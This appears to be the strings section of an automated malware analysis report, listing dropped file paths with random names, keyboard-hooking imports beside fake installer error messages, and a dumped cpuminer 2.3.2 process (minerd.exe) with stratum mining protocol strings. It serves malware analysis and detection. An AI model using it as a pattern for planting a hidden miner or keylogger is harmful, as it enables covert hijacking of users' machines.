%Documents and Settings%\%current user%\Application Data

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%System%

xncqnyyorsxlq.exe

wbohuxzhxt.exe

%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796

libcurl.dll

2.5.1

%original file name%.exe_640_rwx_00960000_00018000:

.text

`.rdata

@.data

.rsrc

314127.64

GetProcessWindowStation

ActivateKeyboardLayout

CreateDialogIndirectParamA

EnumChildWindows

EnumThreadWindows

EnumWindows

GetAsyncKeyState

GetKeyNameTextA

GetKeyState

GetKeyboardLayout

GetKeyboardLayoutList

GetKeyboardLayoutNameA

GetKeyboardState

LoadKeyboardLayoutA

MapVirtualKeyA

MsgWaitForMultipleObjects

SetKeyboardState

SetWindowsHookExA

UnhookWindowsHookEx

USER32.dll

ShellExecuteA

SHELL32.dll

OPENGL32.dll

CreateIoCompletionPort

GetCPInfo

KERNEL32.dll

u.vr-

KERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

File %PayloadOne was not foundYError: Unable to complete operation %PayloadOne, no %PayloadTwo file has been opened yet.

File %PayloadOne already exists,Invalid Handle, unable to complete operation

-Failed to open file %PayloadOne, error %error*Not enough diskspace to complete operationOFailed to execute

Error: %error.MSI installation failed with error code %erroriAnother installation is already in progress

Operation '%PayloadOne' was not foundYUser has canceled the operation, rolling back changes, If you see this message it's a bug{Insufficient Rights to complete operation

Please be sure you have Administrator rights before attempting installation againDFailed to open requested registry key

Key: %PayloadOne

Error: %error7Requested registry operation failed

Error: Invalid HiveJFailed to create the requested registry key

Error: %errorJFailed to delete the requested registry key

Uninstall the newer version then run setup againIFatal error in the configuration file, examine the log file for more infouError: This product can only be installed on Windows XP or later. Windows 95, 98, ME, NT, and 2000 are not supported.@Failed to create a new thread

Error: Unsupported Bitness

`Unable to find a drive with sufficent free disk space in order to extract the installation files\Error: This product may not be installed on a computer that has Microsoft HyperV installed.oMicrosoft Runtime DLLs cannot be installed on this operating system. Please see Microsoft KB835732 for details.zYou may be running ACE instances. ACE is no longer supported in this version of VMware Player. Continue with installation?

Canceling Operation...

P/L or /lang <English language name> : Specifies a language to run the installer.R/L or /lang <Localized language name> : Specifies a language to run the installer.]/L or /lang <Three letter language abbreviation> : Specifies a language to run the installer.F/L or /lang <Language id> : Specifies a language to run the installer.J/z or /var <"Key"="value" pairs> : Specify a set of variables to override.'/x or /uninst : Uninstalls the product.V/v or /msi_args <"Key"="value" pairs> : Specify a set of arguments to pass to the MSI.C/clean or /clean : Clean out installation registration information.|/nsr or /noSilentReboot : Suppress an automatic reboot after a successful silent install (does not affect installs with UI).</Language></Three></Localized></English>

minerd.exe_364:

.text

``.data

.rdata

0@.bss

.idata

libgcc_s_dw2-1.dll

libgcj-12.dll

JSON decode of %s failed

http://

https://

stratum tcp://

http://%s

cpuminer 2.3.2

accepted: %lu/%lu (%.2f%%), %s khash/s %s

DEBUG: reject reason: %s

DEBUG: job_id='%s' extranonce2=%s ntime=x

Starting Stratum on %s

...terminating workio thread

...retry after %d seconds

JSON decode failed(%d): %s

{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}

{"method": "getwork", "params": [ "%s" ], "id":1}

JSON key '%s' not found

JSON key '%s' is not a string

CURL initialization failed

%s%s%s

Long-polling activated for %s

json_rpc_call failed, retry after %d seconds

DEBUG: got new work in %d ms

Binding thread %d to cpu %d

thread %d: %lu hashes, %s khash/s

Total: %s khash/s

work retrieval failed, exiting mining thread %d

http://127.0.0.1:9332/

%s: unsupported non-option argument '%s'

JSON option %s invalid

https:

%s:%s

thread %d create failed

%d miner threads started, using '%s' algorithm.

cert

userpass

-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)

-O, --userpass=U:P username:password pair for mining server

-p, --pass=PASSWORD password for mining server

--cert=FILE certificate for mining server using SSL

-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy

--no-longpoll disable X-Long-Polling support

--no-stratum disable X-Stratum support

[%d-d-d d:d:d] %s

User-Agent: cpuminer/2.3.2

HTTP request failed: %s

JSON-RPC call failed: %s

hex2bin failed on '%s'

DEBUG: %s

Hash: %s

Target: %s

http%s

http_proxy

Stratum connection failed: %s

{"id": 1, "method": "mining.subscribe", "params": []}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}

mining.notify

Stratum session id: %s

mining.set_difficulty

client.reconnect

stratum tcp://%s:%d

Server requested reconnection to %s

client.get_version

cpuminer/2.3.2

client.show_message

MESSAGE FROM SERVER: %s

{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}

%s near '%s'

%s near end of file

unable to decode byte 0x%x at position %d

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

end == saved_text lex->saved_text.length

unable to open %s: %s

\ux

\ux\ux

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

O%s: option requires an argument -- %c

%s: unrecognised option `-%s'

%s: invalid option -- %c

option `%s%s' doesn't accept an argument

option `%s%s' requires an argument

%s: option `%s' is ambiguous

%s: unrecognised option `%s'

1404407002 5702

curl_easy_cleanup

curl_easy_init

curl_easy_perform

curl_easy_reset

curl_easy_setopt

curl_global_init

curl_slist_append

curl_slist_free_all

curl_version

pthread_join

libcurl.dll

KERNEL32.dll

msvcrt.dll

pthreadGC2.dll

WS2_32.dll

mainCRTStartup

WinMainCRTStartup

_CRT_glob

_CRT_fmode

_CRT_MT

___w64_mingwthr_add_key_dtor

___w64_mingwthr_remove_key_dtor

wcrtomb

__mingwthr_key_t

__mingwthr_key

GNU C 4.5.2

../mingw/crt1.c

C:\MinGW\msys\1.0\src\mingwrt

__mingw_CRTStartup

../mingw/CRTglob.c

../mingw/CRTfmode.c

../mingw/CRT_fp10.c

__report_error

../mingw/crtst.c

__mingwthr_run_key_dtors

keyp

new_key

prev_key

cur_key

key_dtor_list

C:\MinGW\msys\1.0\src\mingwrt\mingwex

%flags

Þst

../../mingw/mingwex/wcrtomb.c

__wcrtomb_cp

crt1.c

CRTglob.c

CRTfmode.c

CRT_fp10.c

c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include

crtst.c

wcrtomb.c

"@"@"@"@

minerd.exe_364_rwx_00400000_0004E000:

.text

``.data

.rdata

0@.bss

.idata

libgcc_s_dw2-1.dll

libgcj-12.dll

JSON decode of %s failed

http://

https://

stratum tcp://

http://%s

cpuminer 2.3.2

accepted: %lu/%lu (%.2f%%), %s khash/s %s

DEBUG: reject reason: %s

DEBUG: job_id='%s' extranonce2=%s ntime=x

Starting Stratum on %s

...terminating workio thread

...retry after %d seconds

JSON decode failed(%d): %s

{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}

{"method": "getwork", "params": [ "%s" ], "id":1}

JSON key '%s' not found

JSON key '%s' is not a string

CURL initialization failed

%s%s%s

Long-polling activated for %s

json_rpc_call failed, retry after %d seconds

DEBUG: got new work in %d ms

Binding thread %d to cpu %d

thread %d: %lu hashes, %s khash/s

Total: %s khash/s

work retrieval failed, exiting mining thread %d

http://127.0.0.1:9332/

%s: unsupported non-option argument '%s'

JSON option %s invalid

https:

%s:%s

thread %d create failed

%d miner threads started, using '%s' algorithm.

cert

userpass

-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)

-O, --userpass=U:P username:password pair for mining server

-p, --pass=PASSWORD password for mining server

--cert=FILE certificate for mining server using SSL

-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy

--no-longpoll disable X-Long-Polling support

--no-stratum disable X-Stratum support

[%d-d-d d:d:d] %s

User-Agent: cpuminer/2.3.2

HTTP request failed: %s

JSON-RPC call failed: %s

hex2bin failed on '%s'

DEBUG: %s

Hash: %s

Target: %s

http%s

http_proxy

Stratum connection failed: %s

{"id": 1, "method": "mining.subscribe", "params": []}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}

{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}

mining.notify

Stratum session id: %s

mining.set_difficulty

client.reconnect

stratum tcp://%s:%d

Server requested reconnection to %s

client.get_version

cpuminer/2.3.2

client.show_message

MESSAGE FROM SERVER: %s

{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}

%s near '%s'

%s near end of file

unable to decode byte 0x%x at position %d

control character 0x%x

invalid Unicode '\uX\uX'

invalid Unicode '\uX'

end == saved_text lex->saved_text.length

unable to open %s: %s

\ux

\ux\ux

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

O%s: option requires an argument -- %c

%s: unrecognised option `-%s'

%s: invalid option -- %c

option `%s%s' doesn't accept an argument

option `%s%s' requires an argument

%s: option `%s' is ambiguous

%s: unrecognised option `%s'

1404407002 5702

curl_easy_cleanup

curl_easy_init

curl_easy_perform

curl_easy_reset

curl_easy_setopt

curl_global_init

curl_slist_append

curl_slist_free_all

curl_version

pthread_join

libcurl.dll

KERNEL32.dll

msvcrt.dll

pthreadGC2.dll

WS2_32.dll

mainCRTStartup

WinMainCRTStartup

_CRT_glob

_CRT_fmode

_CRT_MT

___w64_mingwthr_add_key_dtor

___w64_mingwthr_remove_key_dtor

wcrtomb

__mingwthr_key_t

__mingwthr_key

GNU C 4.5.2

../mingw/crt1.c

C:\MinGW\msys\1.0\src\mingwrt

__mingw_CRTStartup

../mingw/CRTglob.c

../mingw/CRTfmode.c

../mingw/CRT_fp10.c

__report_error

../mingw/crtst.c

__mingwthr_run_key_dtors

keyp

new_key

prev_key

cur_key

key_dtor_list

C:\MinGW\msys\1.0\src\mingwrt\mingwex

%flags

Þst

../../mingw/mingwex/wcrtomb.c

__wcrtomb_cp

crt1.c

CRTglob.c

CRTfmode.c

CRT_fp10.c

c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include

crtst.c

wcrtomb.c

"@"@"@"@

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps